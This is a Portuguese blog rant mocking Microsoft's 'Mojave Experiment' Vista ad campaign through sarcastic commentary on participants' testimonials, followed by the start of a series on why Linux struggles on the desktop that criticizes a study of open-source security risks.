Ok, a partir de agora já estás pronta a dar lições às outras pessoas, essas ignorantes que instalam, usam, passam-se quando querem imprimir alguma coisa, ficam frustados por nunca terem aquela coisa em condições, que é mais lento que uma locomotiva a vapor, não permite o dual-boot (a partir do SP1 - artigo a sair de imediato), etc.. Essas pessoas se são teus amigos vão ficar muito contentes vão...

12. (Agora que já sabe que isto é o Vista...)
É um Martini seco...
(e anteriormente o que pensava?)
Um whisky barato com Coca-Cola...
Com esta é que me passei! Alguém me sabe esclarecer qual é a diferença? Este gajo parece ser um barman, será que um Martini seco é a melhor bebida que ele sabe fazer ou será que um martini seco é a melhor bebida do mundo!? Não parece pois não!? Até parece do mais vulgar que há a par com o whisky barato com Coca-Cola! Este gozou e à grande com os egos inchados dos tótós da M$ e eles nem deram por ela! Se alguma vez me pedissem para ilustrar o Fedora (apenas por exemplo) versus as ordinárias coisas da M$ diria - Linux = Whisky de malte 12 anos puro / XP = Zurrapa de vinho feito a martelo / Me2 = Vinagre.

13. A sério!?
Wow!
Filho de uma arma!
Nunca percebi bem este termo mas enfim, dá-se um desconto aos gajos dos EUA.
Apanharam-me!
Estou impressionado!
(comprará?)
Sim. Comprarei. Sim.
Ó filho-de-uma-arma estavas mortinho por fugir, hem? Compro, sim claro, compro mas deixem-se sair daqui está bem!? Pode ser? Já disse tudo o queriam ouvir, agora deixem-me sair? Sim fui eu quem matou o kennedy! E agora já posso sair!?

14. Penso que até a minha mãe o pode usar. Ela vê mal e com estas "tabs" ela pode trabalhar.
Mais uma que andou a comer maçãs envenenadas!? Coitada, ficou adormecida desde o milénio passado! Felizmente apareceu o gajo da M$ com o beijo mágico e ela acordou! Ó pessoal da M$, este também conta!? Desespero ^2

15. Está tudo ao alcance dos dedos. Não temos que andar às voltas. Está tudo ali. Eu gosto. Está tudo no Desktop. Estou impressionada!
Está tudo no desktop!? Tudo, mesmo tudo!? Ui, se está tudo deve estar por aí uma confusão do caraças. Ah!, não está bem tudo... Ok, já deu para perceber... Ainda gostava de saber o que é que usavas anteriormente.
Para andar às voltas foste enganada por um habilidoso vendedor. Ouve lá, acreditas assim tanto em tudo o que um comercial te quer impingir que não notas a diferença entre um carrocel e um computador!?

16. (Em que é que o Mojave é diferente do Vista?)
O homem fica calado durante muito tempo...
Mojave parece mais rápido...
Mais valia teres permanecido calado. Claro que o Mojave parece mais rápido! Foi preparado especialmente pela própria M$ e sem a instalação de mais nada sem ser o próprio espécie de SO!
Para além disso foi apenas uma demonstração de apenas 10 minutos! Estavas à espera de quê!? Que os gajos instalassem os anti-virus, anti-spyware, spybot, M$ Office, passassem um filme completo, gravassem uns DVD, imprimissem um relatório com 40 páginas do Access, etc?! Deves estar maluco! Ou estarias à espera que ficasses todo o dia a trabalhar com ele em diversas aplicações, jogar uns jogos, imprimir uns relatórios e trabalhares um bocado no Solitário!? Querias um computador com tudo o que um ser humano normal costuma lá colocar !? Para quê? Para estragar estes depoimentos que mesmo assim não valem um ponto de um corno!?
Ó pá isto não funciona assim. Tu apenas vês aquilo que eles fazem, e em apenas 10 minutos, não tocas em nada, não fazes perguntas embaraçosas como os outros 100 fizeram o que já lhes deu direito a um pontapé no cú!
Ouviste bem!?
Entendeste!?
Só depois disso é que podes passar na Tesouraria...

17. Só tinha ouvido falar do Vista através dos media.
Parece-me fácil agora que o vi.
Talvez eles não estivessem preparados...
Pois, pois!
Parece-te fácil?
Claro que te parece fácil. Não mexeste um dedo e apenas assististe a uma apresentação info-comercial de 10 minutos. Ouve lá, estavas à espera de quê!?
Porventura estavas à espera que a M$ dificultasse a coisa, como por exemplo pôr-te a ti a instalar o espécie de SO!?
Ou que configurasses uma impressora!?
Ou que activasse o UAC e colocar-te a ti a instalar qualquer merdinha!?
Ouve, assistir a uma demonstração de alguma coisa pode ser uma monotonia do caraças ou ser chato até dar para adormecer mas de uma coisa tenho a certeza - para quem está a assistir é fácil. Muito fácil!
Há uns tampos atrás comprei, numa Feira, uma máquina de fazer sumos. O gajo que demonstrava aquilo fazia-o de uma maneira que parecia que a máquina fazia tudo sózinha. Neste momento está encostada assim como milhares de outras que abundam por esses lares fora. Decerto, toda a gente sabe a que me estou a referir.
Claro que os tótós comerciais da M$ estão bem preparados!
Especialmente para 10 minutos já que se for mais já não dá e ficam sem saber o que dizer porque realmente não há mais nada a dizer. Ou melhor, a dizer até há e dava para dias mas é acerca dos defeitos e isso o pessoal da M$ não quer pois não!?
Ouve, e essa dos media não estarem preparados, vendeste-a por quanto!?
Claro que os media não estão preparados!
Claro que os Administradores das maiores empresas do Mundo também não estão preparados!
Claro que muitos organismos oficiais também não estão preparados!
Claro que os utilizadores diários desta porcaria também não estão preparados!
Claro que todos os maiores fabricantes mundiais também não estão preparados!
Claro que mesmo no interior da M$ alguns empregados de topo também não estão preparados!
No fundo ninguém está preparado mas tu conseguiste-o!
Apenas numa demonstração de 10 minutos!
Podes is para casa descansado que o teu cheque é maior que o dos outros. Mereceste-o, sem dúvida!

(continua...)

Como já devem ter reparado não tenho ligado muito às pontuações. Trata-se de um risco calculado. De outra forma não tinha blog onde coubesse tanta coisa.


LEGENDA:
(Intervenções do pessoal da M$)
(Comentários do je para repor um pouco de realidade nesta experiência de merda)
(Comentários traduzidos dos participantes)

CAMBADA DE IGNORANTES!

Vamos lá ver quantos ignorantes existem espalhados pelo mundo fora.
Segundo a nova campanha publicitária da M$ especificamente aquela coisa a que deram o nome de "Mojave Experiment" você é um ignorante se usa um verdadeiro SO e não aquela coisa que é uma espécie de SO.
Ou seja, é a própria M$ quem chama ignorante a mais de 90% dos seus utilizadores. No fundo esta é a única novidade que se pode tirar dos resultados daquela experiência já que o pessoal dos outros verdadeiros SO já está habituado a que a M$ lhes chame tudo e mais alguma coisa, embora a maioria deste pessoal não ligue patavina ao que o monopólio diz.

Porém, muitas questões se levantam em torno desta experiência que podem e devem ser levantadas por quem quer saber a veracidade dos factos e não apenas aquilo que a M$ quer transmitir a todo o ignorante mundo. Assim, achei por conveniente colocar os depoimentos individuais dos intervenientes .
Porém, antes de começar gostaria de salientar alguns pontos de interesse:

1. Nenhum dos envolvidos tocou em qualquer computador;

2. Todos os intervenientes assistiram a uma demonstração de 10 minutos;

3. Esta sessão foi ministrada por um comercial que certamente escolheu aquilo que queria para dar um show que realçasse algo para cativar qualquer pessoa. Toda a gente sabe e reconhece que um bom vendedor é capaz de vender gelo a um esquimó;

4. O hardware foi escolhido a dedo e como não dizem nada, suspeito que apenas tenham instalado o Me2 devidamente preparado pelos técnicos da M$ de forma a obter o máximo de performance ao mesmo tempo que teriam que evitar qualquer erro. Lembrem-se que foi a própria M$ quem instalou tudo e também escolheu aquilo que queria mostrar. Por isso algumas opiniões foram no sentido de responder "rápido". Pudera!

5. Se estiveram envolvidas 140 pessoas, segundo se pode ler no site oficial, porque é que apenas aparecem quarenta depoimentos individuais?
O que aconteceu com as restantes 100 pessoas!?

6. Porque é que a M$ teve que recorrer a comentários repetidos?
140 pessoas.
Segundo querem fazer acreditar foi um sucesso.
Porque não conseguem preencher mais que 40 quadros sem recorrerem a repetições ou a conjuntos de respostas?
Querem-nos fazer acreditar que 140 pessoas viram o show de 10 minutos, decerto excelentemente preparado pelo marketing da M$, no final apenas conseguem recolher uns esfarrapados 40 comentários e que consideram isto uma grande vitória!?

7. Apenas por uma questão de transparência, porque não colocam online tudo o que se passou!?
É que desta forma, tudo parece indicar que esta experiência não passa de um anúncio publicitário previamente preparado com o recurso a actores. A minha primeira impressão foi exactamente igual a quando vejo um daqueles anúncios em que alguém bate à porta e a dona-da-casa abre a porta e fica muito espantada por ter à sua frente o pessoal da TV!
Tal e qual!
Quem é que pode acreditar nisto ou quem pode garantir que tudo não passou de uma montagem à Hollywood!?
Os resultados podem ser certificados por uma empresa verdadeiramente independente!?

Enquanto a M$ não vier a público responder às imensas questões que estão a ser colocadas e provar a veracidade dos factos, nunca conseguirá fazer com que todo o mundo acredite numa coisa que mais parece uma farsa e que deve ter comido uma fatia muito grande dos 300 milhões de USD.

PORQUE O LINUX NÃO VENCE NO DESKTOP - 1

Vou tentar começar uma nova série de artigos acerca das possíveis causas do "porque é que o Linux não é bem aceite no desktop". Só que já muitos o fizeram e explicaram, cada um à sua maneira, mas eu quero dar um toque especial e começar um pouco pelo fim. A importância não é um valor fundamental e os artigos irão aparecendo sem qualquer ordem.
Por agora vou-me dedicar a uma pequena série cobrindo apenas a nojeira da M$. Ok, já sei que terei artigos até morrer mesmo que escreva várias vezes por dia mas fiquem descansados que irei apenas fazer um resumo.

"Bora" lá rumo à primeira nojeira:
Ainda recentemente, apareceu este artigo acerca de um estudo efectuado por uma empresa que tinha andado a "estudar" as fraquezas do open-source.
Este artigo foi de tal forma bem elaborado que deve ter causado alguma confusão a muita gente, entre os quais eu me incluo, mas depois de analisado não vale o papel em que foi impresso.

E porquê?
Esta empresa decidiu "estudar" as fraquezas de apenas 11 pacotes Java abertos e a prática de segurança associada. Reparem bem que são apenas 11 pacotes Java...
E a que conclusão chegam estes iluminados?
"Todo o software aberto expõe as empresas a um significativo risco"
Grandioso!
Tal feito nem o Professor Mambo conseguiria fazer. (*) Apenas 11 pacotes Java e eis que por disposição imperial desta empresa todo o software aberto é metido no mesmo saco!
Gostava de ser como eles. Devem ganhar dinheiro à brava à pala de uns tansos que provavelmente acreditam que o Elvis ainda está vivo...

Acho que não preciso de dizer mais nada acerca desta porcaria que no fundo não passa de uma espécie de estudo.

Ah!, já me esquecia de um pormenor e a esta hora já está um dos meus 2 ou 3 tantos? fiéis leitores a interrogar-se:
- Mas que porra é esta!?
- Este gajo está maluco. O que é que esta merda tem a ver com a M$!?
- Já te vou dizer como é:
- (comentário) É pá estás cada vez pior. O fanatismo cega-te e até já vês o fantasma da M$ em tudo o que tocas. Larga essa droga da M$ da mão e trabalha mas é para o Linux senão ainda aparecem por aí uns gajos a falar em nome do "Linux" e a acusarem-te que só estás a fazer mal ao teu querido SO. Vai mas é de férias e regressa mais calmo.

je - (comentário) Eh pá tens razão.
Foste um gajo porreiro.
Vou ver se me recordo das tuas palavras e tentar fazer o possível para nunca mais cair na mesma tentação.
Estou mesmo a precisar de férias.

Espera aí!
Mas eu estou de férias! (não é bem assim pois nem sequer chega a ser meio dia de férias mas isso agora não interessa)
Ora, se estou de férias devo estar mais descansado e relaxado.
Se estou mais calmo também devo ter alguma razão no que estava a dizer.
E se tenho razão no que estava a dizer onde é que desencantei a nojice da M$?
Tem que estar em algum lado.
Eureka. Está aqui!

(comentário) je - Afinal pá tiveste razão mas apenas numa coisa - esqueci-me de indicar o link que tem a ligação para a notícia do casamento.

A base para esta coisa que se quer afirmar como um post foi roubada daqui.

(*) - Não conheço a personagem mas apenas de ouvir falar. Penso que nem ele é capaz de tal proeza mas como não o conheço até é bem possivel que o Prof. possa fazer a mesma coisa.